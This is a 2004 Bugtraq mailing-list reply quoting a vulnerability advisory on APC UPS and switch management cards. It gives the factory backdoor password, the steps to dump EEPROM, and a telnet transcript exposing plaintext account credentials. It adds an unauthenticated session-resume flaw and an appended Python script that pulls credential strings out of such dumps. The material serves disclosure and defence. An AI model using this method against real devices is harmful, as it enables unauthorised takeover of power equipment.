Message-ID: <20040218165843.31118.qmail@www.securityfocus.com>
Date: 18 Feb 2004 16:58:43 -0000
From: brandon pierce <brandonp@...ynclh.com>
To: bugtraq@...urityfocus.com
Subject: Re: APC 9606 SmartSlot Web/SNMP management card "backdoor"
In-Reply-To: <1076930672.19026.88.camel@...alhost.localdomain>
Just tested on a client's Symmetra RM 12000 and had some interesting results with the following setup:
Model Number: AP9617
Manufacture Date: 12/20/2002
Hardware Revision: A10
Symmetra APP Ver: 120
Symmetra APP Date: 12/09/2002
AOS Card Ver: 120
AOS Card Date: 12/10/2002
There are a few side notes that should be noted:
The backdoor login does NOT show up in the event log for the system.
If the telnet session using the backdoor login is terminated with ^] then the session can be resumed simply by using telnet to sign back in with NO authentication. This even works if attempting to resume the session from a different IP address.
>*** Background:
>APC (American Power Conversion) SmartSwitch and UPS (uninterruptible power
>supply) products have a Web and SNMP management card installed that permits
>local serial console, TELNET, web and SNMP management, monitoring and
>mains power control of attached devices.
>
>
>*** The Problem:
>APC SmartSlot Web/SNMP management cards have a "backdoor" password that can
>be abused to extract plain text username/password details for all accounts
>and hence gain unauthorised full control of the device.
>
>Tested vulnerable:
>SmartUPS 3000RM with AP9606 AOS v3.2.1 and SmartUPS App v3.2.6
>MasterSwitch AP9212 with AP9606 AOS v3.0.3 and MasterSwitch App v2.2.0
>
>
>*** Description:
>The "backdoor" password is designed for use by the factory for initial
>configuration of the card, e.g. MAC Address, Serial Number etc. However, it
>is possible to dump the contents of EEPROM which amongst other things
>stores the account usernames and passwords.
>
>The "backdoor" password is accepted via either the local serial port or
>TELNET. Use of the password on the web interface does not appear to be
>possible.
>
>
>*** To recreate (typical example):
>Connect a console to the serial port or TELNET to the card. At the username
>prompt use any username. The password is all alphabetic characters and is
>case sensitive: TENmanUFactOryPOWER
>
>At the selection prompt, type 13 and press return. Type the byte address of
>the EEPROM location to view, e.g. 1d0 and press return. Look carefully for
>the username and password pairs. Different firmware revisions may have the
>account details at different EEPROM locations. The accounts in the example
>below are the default accounts after their passwords have been changed.
>Username: apc Password: BBCCDDEEF
>Username: device Password: AAAABBBBB
>
>Press return to get back to the Factory Menu and press ctrl-A to logout.
>You can now TELNET to the card again and use the account details you've
>just recovered to log into and control the device.
>
>You should use the other selections with extreme care. You may cause
>irreparable damage and will most certainly invalidate any warranty.
>The EEPROM also contains other user-configurable options in either plain
>text or binary encoded form. They are not detailed in this advisory.
>
>Example:
>
>[root@...ays root]# telnet 192.168.1.1
>Trying 192.168.1.1...
>Connected to 192.168.1.1.
>Escape character is '^]'.
>
>User Name : phade
>Password : TENmanUFactOryPOWER
>
>Factory Menu
><CTRL-A> to exit
>
>1  AP9606
>2  WA0044004472
>3  G9
>4  10/25/2000
>5  00 C0 B7 A2 C8 2D
>6  v3.2.1
>7  A
>8  A
>9  192.168.1.1
>A  255.255.255.0
>B  192.168.1.254
>C
>D
>E
>F
>G
>
>Selection> 13
>
>Enter byte address in Hex(XXXX): 1d0
>
>01D0 FF 50 46 61 70 63 00 FF .PFapc..
>01D8 FF FF FF FF FF FF 42 42 ......BB
>01E0 43 43 44 44 45 45 46 00 CCDDEEF.
>01E8 FF 64 65 76 69 63 65 00 .device.
>01F0 FF FF FF FF 41 41 41 41 ....AAAA
>01F8 42 42 42 42 42 00 FF 61 BBBBB..a
>0200 64 6D 69 6E 20 75 73 65 dmin use
>0208 72 20 70 68 72 61 73 65 r phrase
>0210 00 FF FF FF FF FF FF FF ........
>0218 FF FF FF FF FF FF FF FF ........
>0220 64 65 76 69 63 65 20 75 device u
>0228 73 65 72 20 70 68 72 61 ser phra
>0230 73 65 00 FF FF FF FF FF se......
>0238 FF FF FF FF FF FF FF FF ........
>0240 FF 00 00 FF FF FF FF 21 .......!
>0248 56 00 00 00 00 00 00 55 V......U
>
><sp>nxt,b-bck,p-pch,other-exit
>
>
>*** Workaround/fix:
>Ensure that access to the local serial port is physically restricted and
>disable the TELNET interface as described in the device documentation. A
>patched version of the firmware which requires the management password
>to be entered before accessing the factory settings may be available
>from APC.
>
>
>*** Vendor status:
>APC were first notified six months ago on 12th August 2003 and were
>initially helpful in patching the problem. However, after testing a couple
>of beta fixes I've heard nothing for over 3 months.
>
>Dave Tarbatt,
>http://null.sniffing.net/
>
>
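The advisory leaves the reader to pick the account strings out of the factory-menu EEPROM dump by eye. The following Python script is an added example, not part of Dave Tarbatt's advisory, Brandon Pierce's reply or any APC code: it parses a dump in the format the card prints above (four-digit hex address, eight hex bytes, ASCII column) back into a byte image and lists every run of printable bytes with its EEPROM offset and whether it is NUL-terminated, so the same check can be run over a dump taken from another firmware revision where the accounts sit at different addresses. The embedded dump is a transcription of the one in the advisory; the eight-bytes-per-line assumption, the minimum string length and all function names are mine. Note that the username "apc" shows up with two leading bytes "PF" that the advisory does not explain, which is why the script lists candidates rather than trying to pair them automatically.

```python
import re

# Transcribed from the advisory's dump (Factory Menu selection 13, address 1d0).
EEPROM_DUMP = """\
01D0 FF 50 46 61 70 63 00 FF .PFapc..
01D8 FF FF FF FF FF FF 42 42 ......BB
01E0 43 43 44 44 45 45 46 00 CCDDEEF.
01E8 FF 64 65 76 69 63 65 00 .device.
01F0 FF FF FF FF 41 41 41 41 ....AAAA
01F8 42 42 42 42 42 00 FF 61 BBBBB..a
0200 64 6D 69 6E 20 75 73 65 dmin use
0208 72 20 70 68 72 61 73 65 r phrase
0210 00 FF FF FF FF FF FF FF ........
0218 FF FF FF FF FF FF FF FF ........
0220 64 65 76 69 63 65 20 75 device u
0228 73 65 72 20 70 68 72 61 ser phra
0230 73 65 00 FF FF FF FF FF se......
0238 FF FF FF FF FF FF FF FF ........
0240 FF 00 00 FF FF FF FF 21 .......!
0248 56 00 00 00 00 00 00 55 V......U
"""

# One dump row: 4-hex-digit address, exactly eight hex bytes, then the ASCII
# column. Eight bytes per row is an assumption taken from the dump above.
LINE_RE = re.compile(
    r"^([0-9A-Fa-f]{4})\s+((?:[0-9A-Fa-f]{2}\s+){7}[0-9A-Fa-f]{2})(?:\s|$)"
)


def parse_dump(text):
    """Rebuild the contiguous byte image from a captured dump.

    Returns (base_address, bytes). Rows must be consecutive; a gap means the
    capture was truncated or two dumps were pasted together, so it is an error
    rather than something to paper over.
    """
    base = expected = None
    image = bytearray()
    for raw in text.splitlines():
        m = LINE_RE.match(raw.strip())
        if not m:
            continue  # prompts, blank lines, anything that is not a dump row
        addr = int(m.group(1), 16)
        row = bytes.fromhex("".join(m.group(2).split()))
        if base is None:
            base = addr
        elif addr != expected:
            raise ValueError(f"dump is not contiguous at {addr:04X}")
        image += row
        expected = addr + len(row)
    if base is None:
        raise ValueError("no dump rows found")
    return base, bytes(image)


# Printable ASCII including space; excludes NUL and the 0xFF erased-cell filler.
PRINTABLE = frozenset(range(0x20, 0x7F))


def extract_strings(base, image, min_len=3):
    """Return [(offset, text, nul_terminated)] for printable runs >= min_len.

    A run that ends at the end of the image (no terminator visible) is still
    reported, flagged nul_terminated=False, so a credential cut off by the
    dump window is not silently lost.
    """
    found = []
    i, n = 0, len(image)
    while i < n:
        if image[i] not in PRINTABLE:
            i += 1
            continue
        j = i
        while j < n and image[j] in PRINTABLE:
            j += 1
        if j - i >= min_len:
            nul = j < n and image[j] == 0
            found.append((base + i, image[i:j].decode("ascii"), nul))
        i = j
    return found


def dump_strings(text, min_len=3):
    """Parse a captured dump and list its candidate strings."""
    base, image = parse_dump(text)
    return extract_strings(base, image, min_len)


if __name__ == "__main__":
    for off, s, nul in dump_strings(EEPROM_DUMP):
        print(f"{off:04X}  {'NUL' if nul else '   '}  {s!r}")
```

Run it against a dump pasted in from a telnet or serial capture; it ignores the prompts and menu text around the rows. Offsets are printed in the same form the "Enter byte address" prompt accepts, so a string of interest can be re-dumped directly. Lower `min_len` to 1 to see short runs such as the "!V" marker near the end of the advisory's dump.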